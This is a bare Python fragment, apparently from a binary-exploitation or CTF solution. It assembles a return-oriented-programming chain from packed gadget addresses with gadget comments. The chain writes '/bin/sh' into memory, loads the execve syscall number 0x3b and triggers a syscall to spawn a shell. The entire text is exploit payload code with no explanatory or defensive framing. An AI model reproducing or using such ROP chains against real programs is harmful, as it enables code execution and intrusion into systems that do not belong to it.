payload = p64(0x40b89d)
#0x000000000040b89d: pop rsi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x408593)
# 0x0000000000408593: pop rdi; pop rbp; ret; 
payload += p64(0x41b068)+p64(0x0)+p64(0x40ceb2)
# 0x000000000040ceb2: mov qword ptr [rdi + 8], rsi; ret; 
payload += p64(0x40e520)
# 0x000000000040e520: cmp dl, 0xfc; mov edx, 0; cmovne eax, edx; ret; 
payload += p64(0x40b89d)
# 0x000000000040b89d: pop rsi; ret; 
payload += p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x40bde3)
# 0x000000000040bde3: xchg eax, ebp; ret; 
payload += p64(0x408593)
# 0x0000000000408593: pop rdi; pop rbp; ret; 
payload += p64(0x41b070)+p64(0x0)+p64(0x4080e8)
# 0x00000000004080e8: pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x415a84)
# 0x0000000000415a84: add dh, bh; syscall; 
payload += b''
